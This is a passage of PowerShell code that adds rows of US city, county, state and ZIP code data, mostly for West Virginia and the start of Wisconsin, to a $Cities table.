virginia","WV","54","25825") + $null = $Cities.Rows.Add("Corinne","Wyoming","West virginia","WV","54","25826") + $null = $Cities.Rows.Add("Crab orchard","Raleigh","West virginia","WV","54","25827") + $null = $Cities.Rows.Add("Clifftop","Fayette","West virginia","WV","54","25831") + $null = $Cities.Rows.Add("Daniels","Raleigh","West virginia","WV","54","25832") + $null = $Cities.Rows.Add("Eccles","Raleigh","West virginia","WV","54","25836") + $null = $Cities.Rows.Add("Edmond","Fayette","West virginia","WV","54","25837") + $null = $Cities.Rows.Add("Fairdale","Raleigh","West virginia","WV","54","25839") + $null = $Cities.Rows.Add("Cunard","Fayette","West virginia","WV","54","25840") + $null = $Cities.Rows.Add("Flat top","Mercer","West virginia","WV","54","25841") + $null = $Cities.Rows.Add("Ghent","Raleigh","West virginia","WV","54","25843") + $null = $Cities.Rows.Add("Glen daniel","Raleigh","West virginia","WV","54","25844") + $null = $Cities.Rows.Add("Glen fork","Wyoming","West virginia","WV","54","25845") + $null = $Cities.Rows.Add("Glen jean","Fayette","West virginia","WV","54","25846") + $null = $Cities.Rows.Add("Sullivan","Raleigh","West virginia","WV","54","25847") + $null = $Cities.Rows.Add("Glen rogers","Wyoming","West virginia","WV","54","25848") + $null = $Cities.Rows.Add("Glen white","Raleigh","West virginia","WV","54","25849") + $null = $Cities.Rows.Add("Helen","Raleigh","West virginia","WV","54","25853") + $null = $Cities.Rows.Add("Hico","Fayette","West virginia","WV","54","25854") + $null = $Cities.Rows.Add("Hilltop","Fayette","West virginia","WV","54","25855") + $null = $Cities.Rows.Add("Jonben","Raleigh","West virginia","WV","54","25856") + $null = $Cities.Rows.Add("Josephine","Raleigh","West virginia","WV","54","25857") + $null = $Cities.Rows.Add("Lansing","Fayette","West virginia","WV","54","25862") + $null = $Cities.Rows.Add("Lawton","Fayette","West virginia","WV","54","25864") + $null = $Cities.Rows.Add("Lester","Raleigh","West virginia","WV","54","25865") + $null = $Cities.Rows.Add("Lochgelly","Fayette","West virginia","WV","54","25866") + $null = $Cities.Rows.Add("Lookout","Fayette","West virginia","WV","54","25868") + $null = $Cities.Rows.Add("Maben","Wyoming","West virginia","WV","54","25870") + $null = $Cities.Rows.Add("Mabscott","Raleigh","West virginia","WV","54","25871") + $null = $Cities.Rows.Add("Mc graws","Wyoming","West virginia","WV","54","25875") + $null = $Cities.Rows.Add("Midway","Raleigh","West virginia","WV","54","25878") + $null = $Cities.Rows.Add("Minden","Fayette","West virginia","WV","54","25879") + $null = $Cities.Rows.Add("Mount hope","Raleigh","West virginia","WV","54","25880") + $null = $Cities.Rows.Add("Mullens","Wyoming","West virginia","WV","54","25882") + $null = $Cities.Rows.Add("Zcta 258hh","Fayette","West virginia","WV","54","258HH") + $null = $Cities.Rows.Add("Harvey","Fayette","West virginia","WV","54","25901") + $null = $Cities.Rows.Add("Odd","Raleigh","West virginia","WV","54","25902") + $null = $Cities.Rows.Add("Pax","Fayette","West virginia","WV","54","25904") + $null = $Cities.Rows.Add("Prince","Fayette","West virginia","WV","54","25907") + $null = $Cities.Rows.Add("Winding gulf","Raleigh","West virginia","WV","54","25908") + $null = $Cities.Rows.Add("Prosperity","Raleigh","West virginia","WV","54","25909") + $null = $Cities.Rows.Add("Ravencliff","Wyoming","West virginia","WV","54","25913") + $null = $Cities.Rows.Add("East gulf","Raleigh","West virginia","WV","54","25915") + $null = $Cities.Rows.Add("Sabine","Wyoming","West virginia","WV","54","25916") + $null = $Cities.Rows.Add("Scarbro","Fayette","West virginia","WV","54","25917") + $null = $Cities.Rows.Add("Abraham","Raleigh","West virginia","WV","54","25918") + $null = $Cities.Rows.Add("Slab fork","Raleigh","West virginia","WV","54","25920") + $null = $Cities.Rows.Add("Mcalpin","Raleigh","West virginia","WV","54","25921") + $null = $Cities.Rows.Add("Spanishburg","Mercer","West virginia","WV","54","25922") + $null = $Cities.Rows.Add("Stephenson","Wyoming","West virginia","WV","54","25928") + $null = $Cities.Rows.Add("Surveyor","Raleigh","West virginia","WV","54","25932") + $null = $Cities.Rows.Add("Thurmond","Fayette","West virginia","WV","54","25936") + $null = $Cities.Rows.Add("Victor","Fayette","West virginia","WV","54","25938") + $null = $Cities.Rows.Add("Winona","Fayette","West virginia","WV","54","25942") + $null = $Cities.Rows.Add("Hinton","Summers","West virginia","WV","54","25951") + $null = $Cities.Rows.Add("Charmco","Greenbrier","West virginia","WV","54","25958") + $null = $Cities.Rows.Add("Rainelle","Greenbrier","West virginia","WV","54","25962") + $null = $Cities.Rows.Add("Green sulphur sp","Summers","West virginia","WV","54","25966") + $null = $Cities.Rows.Add("Streeter","Summers","West virginia","WV","54","25969") + $null = $Cities.Rows.Add("Lerona","Mercer","West virginia","WV","54","25971") + $null = $Cities.Rows.Add("Leslie","Greenbrier","West virginia","WV","54","25972") + $null = $Cities.Rows.Add("Meadow bridge","Fayette","West virginia","WV","54","25976") + $null = $Cities.Rows.Add("Meadow creek","Summers","West virginia","WV","54","25977") + $null = $Cities.Rows.Add("Nimitz","Summers","West virginia","WV","54","25978") + $null = $Cities.Rows.Add("Pipestem","Summers","West virginia","WV","54","25979") + $null = $Cities.Rows.Add("Marfrance","Greenbrier","West virginia","WV","54","25981") + $null = $Cities.Rows.Add("Kessler","Greenbrier","West virginia","WV","54","25984") + $null = $Cities.Rows.Add("Sandstone","Summers","West virginia","WV","54","25985") + $null = $Cities.Rows.Add("Spring dale","Fayette","West virginia","WV","54","25986") + $null = $Cities.Rows.Add("White oak","Raleigh","West virginia","WV","54","25989") + $null = $Cities.Rows.Add("Zcta 259hh","Fayette","West virginia","WV","54","259HH") + $null = $Cities.Rows.Add("Zcta 259xx","Greenbrier","West virginia","WV","54","259XX") + $null = $Cities.Rows.Add("Elm grove","Ohio","West virginia","WV","54","26003") + $null = $Cities.Rows.Add("Beech bottom","Brooke","West virginia","WV","54","26030") + $null = $Cities.Rows.Add("Benwood","Marshall","West virginia","WV","54","26031") + $null = $Cities.Rows.Add("Bethany","Brooke","West virginia","WV","54","26032") + $null = $Cities.Rows.Add("Cameron","Marshall","West virginia","WV","54","26033") + $null = $Cities.Rows.Add("Chester","Hancock","West virginia","WV","54","26034") + $null = $Cities.Rows.Add("Colliers","Brooke","West virginia","WV","54","26035") + $null = $Cities.Rows.Add("Dallas","Marshall","West virginia","WV","54","26036") + $null = $Cities.Rows.Add("Follansbee","Brooke","West virginia","WV","54","26037") + $null = $Cities.Rows.Add("Glen dale","Marshall","West virginia","WV","54","26038") + $null = $Cities.Rows.Add("Glen easton","Marshall","West virginia","WV","54","26039") + $null = $Cities.Rows.Add("Mc mechen","Marshall","West virginia","WV","54","26040") + $null = $Cities.Rows.Add("Moundsville","Marshall","West virginia","WV","54","26041") + $null = $Cities.Rows.Add("New cumberland","Hancock","West virginia","WV","54","26047") + $null = $Cities.Rows.Add("Newell","Hancock","West virginia","WV","54","26050") + $null = $Cities.Rows.Add("Proctor","Marshall","West virginia","WV","54","26055") + $null = $Cities.Rows.Add("New manchester","Hancock","West virginia","WV","54","26056") + $null = $Cities.Rows.Add("Triadelphia","Ohio","West virginia","WV","54","26059") + $null = $Cities.Rows.Add("Valley grove","Ohio","West virginia","WV","54","26060") + $null = $Cities.Rows.Add("Weirton","Hancock","West virginia","WV","54","26062") + $null = $Cities.Rows.Add("Wellsburg","Brooke","West virginia","WV","54","26070") + $null = $Cities.Rows.Add("West liberty","Ohio","West virginia","WV","54","26074") + $null = $Cities.Rows.Add("Windsor heights","Brooke","West virginia","WV","54","26075") + $null = $Cities.Rows.Add("Zcta 260hh","Brooke","West virginia","WV","54","260HH") + $null = $Cities.Rows.Add("Parkersburg","Wood","West virginia","WV","54","26101") + $null = $Cities.Rows.Add("North parkersbur","Wood","West virginia","WV","54","26104") + $null = $Cities.Rows.Add("Vienna","Wood","West virginia","WV","54","26105") + $null = $Cities.Rows.Add("Belleville","Wood","West virginia","WV","54","26133") + $null = $Cities.Rows.Add("Willow island","Pleasants","West virginia","WV","54","26134") + $null = $Cities.Rows.Add("Big bend","Calhoun","West virginia","WV","54","26136") + $null = $Cities.Rows.Add("Nobe","Calhoun","West virginia","WV","54","26137") + $null = $Cities.Rows.Add("Brohard","Wirt","West virginia","WV","54","26138") + $null = $Cities.Rows.Add("Creston","Calhoun","West virginia","WV","54","26141") + $null = $Cities.Rows.Add("Davisville","Wood","West virginia","WV","54","26142") + $null = $Cities.Rows.Add("Elizabeth","Wirt","West virginia","WV","54","26143") + $null = $Cities.Rows.Add("Friendly","Tyler","West virginia","WV","54","26146") + $null = $Cities.Rows.Add("Grantsville","Calhoun","West virginia","WV","54","26147") + $null = $Cities.Rows.Add("Macfarlan","Ritchie","West virginia","WV","54","26148") + $null = $Cities.Rows.Add("Middlebourne","Tyler","West virginia","WV","54","26149") + $null = $Cities.Rows.Add("Mineralwells","Wood","West virginia","WV","54","26150") + $null = $Cities.Rows.Add("Mount zion","Calhoun","West virginia","WV","54","26151") + $null = $Cities.Rows.Add("Munday","Calhoun","West virginia","WV","54","26152") + $null = $Cities.Rows.Add("New martinsville","Wetzel","West virginia","WV","54","26155") + $null = $Cities.Rows.Add("Paden city","Wetzel","West virginia","WV","54","26159") + $null = $Cities.Rows.Add("Palestine","Wirt","West virginia","WV","54","26160") + $null = $Cities.Rows.Add("Petroleum","Ritchie","West virginia","WV","54","26161") + $null = $Cities.Rows.Add("Porters falls","Wetzel","West virginia","WV","54","26162") + $null = $Cities.Rows.Add("Ravenswood","Jackson","West virginia","WV","54","26164") + $null = $Cities.Rows.Add("Reader","Wetzel","West virginia","WV","54","26167") + $null = $Cities.Rows.Add("Rockport","Wood","West virginia","WV","54","26169") + $null = $Cities.Rows.Add("Saint marys","Pleasants","West virginia","WV","54","26170") + $null = $Cities.Rows.Add("Sistersville","Tyler","West virginia","WV","54","26175") + $null = $Cities.Rows.Add("Smithville","Ritchie","West virginia","WV","54","26178") + $null = $Cities.Rows.Add("Walker","Wood","West virginia","WV","54","26180") + $null = $Cities.Rows.Add("New england","Wood","West virginia","WV","54","26181") + $null = $Cities.Rows.Add("Waverly","Wood","West virginia","WV","54","26184") + $null = $Cities.Rows.Add("Wileyville","Wetzel","West virginia","WV","54","26186") + $null = $Cities.Rows.Add("Williamstown","Wood","West virginia","WV","54","26187") + $null = $Cities.Rows.Add("Zcta 261hh","Jackson","West virginia","WV","54","261HH") + $null = $Cities.Rows.Add("Tennerton","Upshur","West virginia","WV","54","26201") + $null = $Cities.Rows.Add("Fenwick","Nicholas","West virginia","WV","54","26202") + $null = $Cities.Rows.Add("Erbacon","Webster","West virginia","WV","54","26203") + $null = $Cities.Rows.Add("Craigsville","Nicholas","West virginia","WV","54","26205") + $null = $Cities.Rows.Add("Cowen","Webster","West virginia","WV","54","26206") + $null = $Cities.Rows.Add("Gauley mills","Webster","West virginia","WV","54","26208") + $null = $Cities.Rows.Add("Snowshoe","Pocahontas","West virginia","WV","54","26209") + $null = $Cities.Rows.Add("Adrian","Upshur","West virginia","WV","54","26210") + $null = $Cities.Rows.Add("Cleveland","Webster","West virginia","WV","54","26215") + $null = $Cities.Rows.Add("Diana","Webster","West virginia","WV","54","26217") + $null = $Cities.Rows.Add("Alexander","Upshur","West virginia","WV","54","26218") + $null = $Cities.Rows.Add("Replete","Webster","West virginia","WV","54","26222") + $null = $Cities.Rows.Add("Helvetia","Randolph","West virginia","WV","54","26224") + $null = $Cities.Rows.Add("Kanawha head","Upshur","West virginia","WV","54","26228") + $null = $Cities.Rows.Add("Pickens","Randolph","West virginia","WV","54","26230") + $null = $Cities.Rows.Add("Rock cave","Upshur","West virginia","WV","54","26234") + $null = $Cities.Rows.Add("Selbyville","Upshur","West virginia","WV","54","26236") + $null = $Cities.Rows.Add("Tallmansville","Upshur","West virginia","WV","54","26237") + $null = $Cities.Rows.Add("Volga","Barbour","West virginia","WV","54","26238") + $null = $Cities.Rows.Add("Elkins","Randolph","West virginia","WV","54","26241") + $null = $Cities.Rows.Add("Belington","Barbour","West virginia","WV","54","26250") + $null = $Cities.Rows.Add("Beverly","Randolph","West virginia","WV","54","26253") + $null = $Cities.Rows.Add("Wymer","Randolph","West virginia","WV","54","26254") + $null = $Cities.Rows.Add("Coalton","Randolph","West virginia","WV","54","26257") + $null = $Cities.Rows.Add("Dailey","Randolph","West virginia","WV","54","26259") + $null = $Cities.Rows.Add("Davis","Tucker","West virginia","WV","54","26260") + $null = $Cities.Rows.Add("Richwood","Nicholas","West virginia","WV","54","26261") + $null = $Cities.Rows.Add("Dryfork","Tucker","West virginia","WV","54","26263") + $null = $Cities.Rows.Add("Durbin","Pocahontas","West virginia","WV","54","26264") + $null = $Cities.Rows.Add("Upperglade","Webster","West virginia","WV","54","26266") + $null = $Cities.Rows.Add("Ellamore","Randolph","West virginia","WV","54","26267") + $null = $Cities.Rows.Add("Glady","Randolph","West virginia","WV","54","26268") + $null = $Cities.Rows.Add("Hambleton","Tucker","West virginia","WV","54","26269") + $null = $Cities.Rows.Add("Harman","Randolph","West virginia","WV","54","26270") + $null = $Cities.Rows.Add("Hendricks","Tucker","West virginia","WV","54","26271") + $null = $Cities.Rows.Add("Huttonsville","Randolph","West virginia","WV","54","26273") + $null = $Cities.Rows.Add("Junior","Barbour","West virginia","WV","54","26275") + $null = $Cities.Rows.Add("Kerens","Randolph","West virginia","WV","54","26276") + $null = $Cities.Rows.Add("Mabie","Randolph","West virginia","WV","54","26278") + $null = $Cities.Rows.Add("Mill creek","Randolph","West virginia","WV","54","26280") + $null = $Cities.Rows.Add("Monterville","Randolph","West virginia","WV","54","26282") + $null = $Cities.Rows.Add("Montrose","Randolph","West virginia","WV","54","26283") + $null = $Cities.Rows.Add("Norton","Randolph","West virginia","WV","54","26285") + $null = $Cities.Rows.Add("Parsons","Tucker","West virginia","WV","54","26287") + $null = $Cities.Rows.Add("Bolair","Webster","West virginia","WV","54","26288") + $null = $Cities.Rows.Add("Red creek","Tucker","West virginia","WV","54","26289") + $null = $Cities.Rows.Add("Slatyfork","Pocahontas","West virginia","WV","54","26291") + $null = $Cities.Rows.Add("Thomas","Tucker","West virginia","WV","54","26292") + $null = $Cities.Rows.Add("Valley bend","Randolph","West virginia","WV","54","26293") + $null = $Cities.Rows.Add("Mingo","Randolph","West virginia","WV","54","26294") + $null = $Cities.Rows.Add("Job","Randolph","West virginia","WV","54","26296") + $null = $Cities.Rows.Add("Bergoo","Webster","West virginia","WV","54","26298") + $null = $Cities.Rows.Add("Zcta 262hh","Barbour","West virginia","WV","54","262HH") + $null = $Cities.Rows.Add("Zcta 262xx","Tucker","West virginia","WV","54","262XX") + $null = $Cities.Rows.Add("Nutter fort ston","Harrison","West virginia","WV","54","26301") + $null = $Cities.Rows.Add("Clarksburg","Harrison","West virginia","WV","54","26302") + $null = $Cities.Rows.Add("Wilbur","Tyler","West virginia","WV","54","26320") + $null = $Cities.Rows.Add("Alum bridge","Lewis","West virginia","WV","54","26321") + $null = $Cities.Rows.Add("Anmoore","Harrison","West virginia","WV","54","26323") + $null = $Cities.Rows.Add("Auburn","Ritchie","West virginia","WV","54","26325") + $null = $Cities.Rows.Add("Berea","Ritchie","West virginia","WV","54","26327") + $null = $Cities.Rows.Add("Bridgeport","Harrison","West virginia","WV","54","26330") + $null = $Cities.Rows.Add("Bristol","Harrison","West virginia","WV","54","26332") + $null = $Cities.Rows.Add("Brownton","Barbour","West virginia","WV","54","26334") + $null = $Cities.Rows.Add("Gem","Braxton","West virginia","WV","54","26335") + $null = $Cities.Rows.Add("Cairo","Ritchie","West virginia","WV","54","26337") + $null = $Cities.Rows.Add("Camden","Lewis","West virginia","WV","54","26338") + $null = $Cities.Rows.Add("Center point","Doddridge","West virginia","WV","54","26339") + $null = $Cities.Rows.Add("Coxs mills","Gilmer","West virginia","WV","54","26342") + $null = $Cities.Rows.Add("Crawford","Lewis","West virginia","WV","54","26343") + $null = $Cities.Rows.Add("Highland","Ritchie","West virginia","WV","54","26346") + $null = $Cities.Rows.Add("Wendel","Taylor","West virginia","WV","54","26347") + $null = $Cities.Rows.Add("Folsom","Wetzel","West virginia","WV","54","26348") + $null = $Cities.Rows.Add("Galloway","Barbour","West virginia","WV","54","26349") + $null = $Cities.Rows.Add("Baldwin","Gilmer","West virginia","WV","54","26351") + $null = $Cities.Rows.Add("Grafton","Taylor","West virginia","WV","54","26354") + $null = $Cities.Rows.Add("Gypsy","Harrison","West virginia","WV","54","26361") + $null = $Cities.Rows.Add("Mahone","Ritchie","West virginia","WV","54","26362") + $null = $Cities.Rows.Add("Haywood","Harrison","West virginia","WV","54","26366") + $null = $Cities.Rows.Add("Hepzibah","Harrison","West virginia","WV","54","26369") + $null = $Cities.Rows.Add("Horner","Lewis","West virginia","WV","54","26372") + $null = $Cities.Rows.Add("Independence","Preston","West virginia","WV","54","26374") + $null = $Cities.Rows.Add("Wildcat","Lewis","West virginia","WV","54","26376") + $null = $Cities.Rows.Add("Jacksonburg","Wetzel","West virginia","WV","54","26377") + $null = $Cities.Rows.Add("Jane lew","Lewis","West virginia","WV","54","26378") + $null = $Cities.Rows.Add("Linn","Gilmer","West virginia","WV","54","26384") + $null = $Cities.Rows.Add("Lost creek","Harrison","West virginia","WV","54","26385") + $null = $Cities.Rows.Add("Lumberport","Harrison","West virginia","WV","54","26386") + $null = $Cities.Rows.Add("Zcta 263hh","Lewis","West virginia","WV","54","263HH") + $null = $Cities.Rows.Add("Meadowbrook","Harrison","West virginia","WV","54","26404") + $null = $Cities.Rows.Add("Kasson","Barbour","West virginia","WV","54","26405") + $null = $Cities.Rows.Add("Mount clare","Harrison","West virginia","WV","54","26408") + $null = $Cities.Rows.Add("Newburg","Preston","West virginia","WV","54","26410") + $null = $Cities.Rows.Add("New milton","Doddridge","West virginia","WV","54","26411") + $null = $Cities.Rows.Add("Orlando","Lewis","West virginia","WV","54","26412") + $null = $Cities.Rows.Add("Toll gate","Ritchie","West virginia","WV","54","26415") + $null = $Cities.Rows.Add("Broaddus","Barbour","West virginia","WV","54","26416") + $null = $Cities.Rows.Add("Hastings","Wetzel","West virginia","WV","54","26419") + $null = $Cities.Rows.Add("Pullman","Ritchie","West virginia","WV","54","26421") + $null = $Cities.Rows.Add("Reynoldsville","Harrison","West virginia","WV","54","26422") + $null = $Cities.Rows.Add("Rosemont","Taylor","West virginia","WV","54","26424") + $null = $Cities.Rows.Add("Manheim","Preston","West virginia","WV","54","26425") + $null = $Cities.Rows.Add("Salem","Harrison","West virginia","WV","54","26426") + $null = $Cities.Rows.Add("Sand fork","Gilmer","West virginia","WV","54","26430") + $null = $Cities.Rows.Add("Shinnston","Harrison","West virginia","WV","54","26431") + $null = $Cities.Rows.Add("Simpson","Taylor","West virginia","WV","54","26435") + $null = $Cities.Rows.Add("Smithburg","Doddridge","West virginia","WV","54","26436") + $null = $Cities.Rows.Add("Smithfield","Wetzel","West virginia","WV","54","26437") + $null = $Cities.Rows.Add("Spelter","Harrison","West virginia","WV","54","26438") + $null = $Cities.Rows.Add("Thornton","Taylor","West virginia","WV","54","26440") + $null = $Cities.Rows.Add("Troy","Gilmer","West virginia","WV","54","26443") + $null = $Cities.Rows.Add("Tunnelton","Preston","West virginia","WV","54","26444") + $null = $Cities.Rows.Add("Walkersville","Lewis","West virginia","WV","54","26447") + $null = $Cities.Rows.Add("Wallace","Harrison","West virginia","WV","54","26448") + $null = $Cities.Rows.Add("West milford","Harrison","West virginia","WV","54","26451") + $null = $Cities.Rows.Add("Weston","Lewis","West virginia","WV","54","26452") + $null = $Cities.Rows.Add("West union","Doddridge","West virginia","WV","54","26456") + $null = $Cities.Rows.Add("Wyatt","Harrison","West virginia","WV","54","26463") + $null = $Cities.Rows.Add("Zcta 264hh","Barbour","West virginia","WV","54","264HH") + $null = $Cities.Rows.Add("Zcta 26501","Monongalia","West virginia","WV","54","26501") + $null = $Cities.Rows.Add("Star city","Monongalia","West virginia","WV","54","26505") + $null = $Cities.Rows.Add("Zcta 26508","Monongalia","West virginia","WV","54","26508") + $null = $Cities.Rows.Add("Albright","Preston","West virginia","WV","54","26519") + $null = $Cities.Rows.Add("Arthurdale","Preston","West virginia","WV","54","26520") + $null = $Cities.Rows.Add("Blacksville","Monongalia","West virginia","WV","54","26521") + $null = $Cities.Rows.Add("Bruceton mills","Preston","West virginia","WV","54","26525") + $null = $Cities.Rows.Add("Core","Monongalia","West virginia","WV","54","26529") + $null = $Cities.Rows.Add("Dellslow","Monongalia","West virginia","WV","54","26531") + $null = $Cities.Rows.Add("Granville","Monongalia","West virginia","WV","54","26534") + $null = $Cities.Rows.Add("Kingwood","Preston","West virginia","WV","54","26537") + $null = $Cities.Rows.Add("Maidsville","Monongalia","West virginia","WV","54","26541") + $null = $Cities.Rows.Add("Cascade","Preston","West virginia","WV","54","26542") + $null = $Cities.Rows.Add("Osage","Monongalia","West virginia","WV","54","26543") + $null = $Cities.Rows.Add("Pentress","Monongalia","West virginia","WV","54","26544") + $null = $Cities.Rows.Add("Reedsville","Preston","West virginia","WV","54","26547") + $null = $Cities.Rows.Add("Monongah","Marion","West virginia","WV","54","26554") + $null = $Cities.Rows.Add("Barrackville","Marion","West virginia","WV","54","26559") + $null = $Cities.Rows.Add("Coburn","Wetzel","West virginia","WV","54","26562") + $null = $Cities.Rows.Add("Carolina","Marion","West virginia","WV","54","26563") + $null = $Cities.Rows.Add("Enterprise","Harrison","West virginia","WV","54","26568") + $null = $Cities.Rows.Add("Fairview","Marion","West virginia","WV","54","26570") + $null = $Cities.Rows.Add("Farmington","Marion","West virginia","WV","54","26571") + $null = $Cities.Rows.Add("Four states","Marion","West virginia","WV","54","26572") + $null = $Cities.Rows.Add("Grant town","Marion","West virginia","WV","54","26574") + $null = $Cities.Rows.Add("Hundred","Wetzel","West virginia","WV","54","26575") + $null = $Cities.Rows.Add("Idamay","Marion","West virginia","WV","54","26576") + $null = $Cities.Rows.Add("Littleton","Wetzel","West virginia","WV","54","26581") + $null = $Cities.Rows.Add("Mannington","Marion","West virginia","WV","54","26582") + $null = $Cities.Rows.Add("Metz","Marion","West virginia","WV","54","26585") + $null = $Cities.Rows.Add("Montana mines","Marion","West virginia","WV","54","26586") + $null = $Cities.Rows.Add("Rachel","Marion","West virginia","WV","54","26587") + $null = $Cities.Rows.Add("Rivesville","Marion","West virginia","WV","54","26588") + $null = $Cities.Rows.Add("Wadestown","Monongalia","West virginia","WV","54","26589") + $null = $Cities.Rows.Add("Wana","Monongalia","West virginia","WV","54","26590") + $null = $Cities.Rows.Add("Worthington","Marion","West virginia","WV","54","26591") + $null = $Cities.Rows.Add("Zcta 265hh","Marion","West virginia","WV","54","265HH") + $null = $Cities.Rows.Add("Herold","Braxton","West virginia","WV","54","26601") + $null = $Cities.Rows.Add("Birch river","Nicholas","West virginia","WV","54","26610") + $null = $Cities.Rows.Add("Flower","Gilmer","West virginia","WV","54","26611") + $null = $Cities.Rows.Add("Copen","Braxton","West virginia","WV","54","26615") + $null = $Cities.Rows.Add("Dille","Clay","West virginia","WV","54","26617") + $null = $Cities.Rows.Add("Riffle","Braxton","West virginia","WV","54","26619") + $null = $Cities.Rows.Add("Corley","Braxton","West virginia","WV","54","26621") + $null = $Cities.Rows.Add("Clem","Braxton","West virginia","WV","54","26623") + $null = $Cities.Rows.Add("Gassaway","Braxton","West virginia","WV","54","26624") + $null = $Cities.Rows.Add("Heaters","Braxton","West virginia","WV","54","26627") + $null = $Cities.Rows.Add("Tesla","Braxton","West virginia","WV","54","26629") + $null = $Cities.Rows.Add("Napier","Braxton","West virginia","WV","54","26631") + $null = $Cities.Rows.Add("Perkins","Gilmer","West virginia","WV","54","26634") + $null = $Cities.Rows.Add("Rosedale","Gilmer","West virginia","WV","54","26636") + $null = $Cities.Rows.Add("Shock","Gilmer","West virginia","WV","54","26638") + $null = $Cities.Rows.Add("Strange creek","Braxton","West virginia","WV","54","26639") + $null = $Cities.Rows.Add("Wilsie","Braxton","West virginia","WV","54","26641") + $null = $Cities.Rows.Add("Summersville","Nicholas","West virginia","WV","54","26651") + $null = $Cities.Rows.Add("Belva","Nicholas","West virginia","WV","54","26656") + $null = $Cities.Rows.Add("Calvin","Nicholas","West virginia","WV","54","26660") + $null = $Cities.Rows.Add("Canvas","Nicholas","West virginia","WV","54","26662") + $null = $Cities.Rows.Add("Drennen","Nicholas","West virginia","WV","54","26667") + $null = $Cities.Rows.Add("Gilboa","Nicholas","West virginia","WV","54","26671") + $null = $Cities.Rows.Add("Jodie","Fayette","West virginia","WV","54","26674") + $null = $Cities.Rows.Add("Leivasy","Nicholas","West virginia","WV","54","26676") + $null = $Cities.Rows.Add("Mount lookout","Nicholas","West virginia","WV","54","26678") + $null = $Cities.Rows.Add("Runa","Nicholas","West virginia","WV","54","26679") + $null = $Cities.Rows.Add("Russelville","Fayette","West virginia","WV","54","26680") + $null = $Cities.Rows.Add("Nettie","Nicholas","West virginia","WV","54","26681") + $null = $Cities.Rows.Add("Pool","Nicholas","West virginia","WV","54","26684") + $null = $Cities.Rows.Add("Swiss","Nicholas","West virginia","WV","54","26690") + $null = $Cities.Rows.Add("Tioga","Nicholas","West virginia","WV","54","26691") + $null = $Cities.Rows.Add("Zcta 266hh","Fayette","West virginia","WV","54","266HH") + $null = $Cities.Rows.Add("Zcta 266xx","Nicholas","West virginia","WV","54","266XX") + $null = $Cities.Rows.Add("Augusta","Hampshire","West virginia","WV","54","26704") + $null = $Cities.Rows.Add("Amboy","Preston","West virginia","WV","54","26705") + $null = $Cities.Rows.Add("Wilson","Grant","West virginia","WV","54","26707") + $null = $Cities.Rows.Add("Burlington","Mineral","West virginia","WV","54","26710") + $null = $Cities.Rows.Add("Capon bridge","Hampshire","West virginia","WV","54","26711") + $null = $Cities.Rows.Add("Delray","Hampshire","West virginia","WV","54","26714") + $null = $Cities.Rows.Add("Eglon","Preston","West virginia","WV","54","26716") + $null = $Cities.Rows.Add("Elk garden","Mineral","West virginia","WV","54","26717") + $null = $Cities.Rows.Add("Fort ashby","Mineral","West virginia","WV","54","26719") + $null = $Cities.Rows.Add("Gormania","Grant","West virginia","WV","54","26720") + $null = $Cities.Rows.Add("Green spring","Hampshire","West virginia","WV","54","26722") + $null = $Cities.Rows.Add("Scherr","Mineral","West virginia","WV","54","26726") + $null = $Cities.Rows.Add("Lahmansville","Grant","West virginia","WV","54","26731") + $null = $Cities.Rows.Add("Mount storm","Grant","West virginia","WV","54","26739") + $null = $Cities.Rows.Add("New creek","Mineral","West virginia","WV","54","26743") + $null = $Cities.Rows.Add("Piedmont","Mineral","West virginia","WV","54","26750") + $null = $Cities.Rows.Add("Patterson creek","Mineral","West virginia","WV","54","26753") + $null = $Cities.Rows.Add("Rio","Hampshire","West virginia","WV","54","26755") + $null = $Cities.Rows.Add("Romney","Hampshire","West virginia","WV","54","26757") + $null = $Cities.Rows.Add("Shanks","Hampshire","West virginia","WV","54","26761") + $null = $Cities.Rows.Add("Springfield","Hampshire","West virginia","WV","54","26763") + $null = $Cities.Rows.Add("Hopemont","Preston","West virginia","WV","54","26764") + $null = $Cities.Rows.Add("Wiley ford","Mineral","West virginia","WV","54","26767") + $null = $Cities.Rows.Add("Zcta 267hh","Grant","West virginia","WV","54","267HH") + $null = $Cities.Rows.Add("Zcta 267xx","Grant","West virginia","WV","54","267XX") + $null = $Cities.Rows.Add("Baker","Hardy","West virginia","WV","54","26801") + $null = $Cities.Rows.Add("Brandywine","Pendleton","West virginia","WV","54","26802") + $null = $Cities.Rows.Add("Circleville","Pendleton","West virginia","WV","54","26804") + $null = $Cities.Rows.Add("Franklin","Pendleton","West virginia","WV","54","26807") + $null = $Cities.Rows.Add("High view","Hampshire","West virginia","WV","54","26808") + $null = $Cities.Rows.Add("Lost city","Hardy","West virginia","WV","54","26810") + $null = $Cities.Rows.Add("Mathias","Hardy","West virginia","WV","54","26812") + $null = $Cities.Rows.Add("Riverton","Pendleton","West virginia","WV","54","26814") + $null = $Cities.Rows.Add("Sugar grove","Pendleton","West virginia","WV","54","26815") + $null = $Cities.Rows.Add("Bloomery","Hampshire","West virginia","WV","54","26817") + $null = $Cities.Rows.Add("Fisher","Hardy","West virginia","WV","54","26818") + $null = $Cities.Rows.Add("Capon springs","Hampshire","West virginia","WV","54","26823") + $null = $Cities.Rows.Add("Maysville","Grant","West virginia","WV","54","26833") + $null = $Cities.Rows.Add("Rig","Hardy","West virginia","WV","54","26836") + $null = $Cities.Rows.Add("Milam","Hardy","West virginia","WV","54","26838") + $null = $Cities.Rows.Add("Old fields","Hardy","West virginia","WV","54","26845") + $null = $Cities.Rows.Add("Dorcas","Grant","West virginia","WV","54","26847") + $null = $Cities.Rows.Add("Wardensville","Hardy","West virginia","WV","54","26851") + $null = $Cities.Rows.Add("Purgitsville","Hampshire","West virginia","WV","54","26852") + $null = $Cities.Rows.Add("Cabins","Grant","West virginia","WV","54","26855") + $null = $Cities.Rows.Add("Lehew","Hampshire","West virginia","WV","54","26865") + $null = $Cities.Rows.Add("Upper tract","Pendleton","West virginia","WV","54","26866") + $null = $Cities.Rows.Add("Seneca rocks","Pendleton","West virginia","WV","54","26884") + $null = $Cities.Rows.Add("Onego","Pendleton","West virginia","WV","54","26886") + $null = $Cities.Rows.Add("Zcta 268hh","Grant","West virginia","WV","54","268HH") + $null = $Cities.Rows.Add("Zcta 268xx","Pendleton","West virginia","WV","54","268XX") + $null = $Cities.Rows.Add("Adell","Sheboygan","Wisconsin","WI","55","53001") + $null = $Cities.Rows.Add("Allenton","Washington","Wisconsin","WI","55","53002") + $null = $Cities.Rows.Add("Ashippun","Dodge","Wisconsin","WI","55","53003") + $null = $Cities.Rows.Add("Belgium","Ozaukee","Wisconsin","WI","55","53004") + $null = $Cities.Rows.Add("Brookfield","Waukesha","Wisconsin","WI","55","53005") + $null = 